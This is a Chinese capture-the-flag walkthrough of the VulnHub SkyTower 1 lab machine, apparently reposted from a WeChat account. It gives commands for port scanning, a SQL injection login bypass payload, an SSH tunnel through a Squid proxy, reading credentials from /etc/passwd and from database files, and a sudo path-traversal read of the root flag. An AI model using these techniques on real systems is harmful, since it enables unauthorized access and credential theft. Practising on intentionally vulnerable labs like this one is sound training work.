虚拟机信息
虚拟机下载地址:
https://www.vulnhub.com/entry/skytower-1,96/
虚拟机简介:您将需要跨越系统和应用程序漏洞的不同方面的技能,以及对各种服务以及如何攻击它们的理解
目标:1个flag
级别:中级
1、主机探测
1、通过netdiscover检测主机IP地址
arp-scan 192.168.1.0/24
2、服务探测
1、通过nmap进行端口扫描
nmap -A -sS -sV -v -p- 10.10.10.100
查看开放80和3128端口
3、渗透测试
3.1 WEB渗透
1.访问站点进行测试
2.SQL注入验证
在login登录框中输入单引号,会产生报错
3.过滤参数输入
通过测试使用如下参数可以绕过系统过滤
' || 1=1#
绕过过滤后,会提示SSH服务的用户名和密码
4.创建隧道
由于测试发现22端口已经被过滤,可以通过squid进行反向代理
proxytunnel -p 192.168.1.6:3128 -d 127.0.0.1:22 -a 2222
5.连接SSH服务
ssh [email protected] -p 2222
通过SSH可以连接,但是连接成功后会自动断开
6.测试环境变量
可能是由于 .bashrc 文件中指定的命令导致连接后直接断开
scp -P 2222 [email protected]:/home/john/.bashrc ./
7.远程删除环境变量文件
ssh -t [email protected] -p 2222 'rm .bashrc'
8.远程连接
ssh [email protected] -p 2222
成功连接到主机
3.2 系统渗透
1.查看数据库信息
cd /var/www/
cat login.php
查看数据库用户名root,密码为root
2.进入数据库查看信息
mysql -uroot -proot
show databases;
3.查看数据表信息
use SkyTech;
select * from login;
4.查看本地用户密码
cat /etc/passwd
5.尝试切换账号
尝试发现william账号密码错误,sara账号禁止登录
6.删除sara账号下的文件
ssh -t [email protected] -p 2222 'rm .bashrc'
ssh [email protected] -p 2222
成功登录账号
7.通过文件滥用读取文件
sudo /bin/cat /accounts/../root/flag.txt
8.切换成root账号
su - root
原文始发于微信公众号(安全孺子牛):OSCP难度靶机之SkyTower 1
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论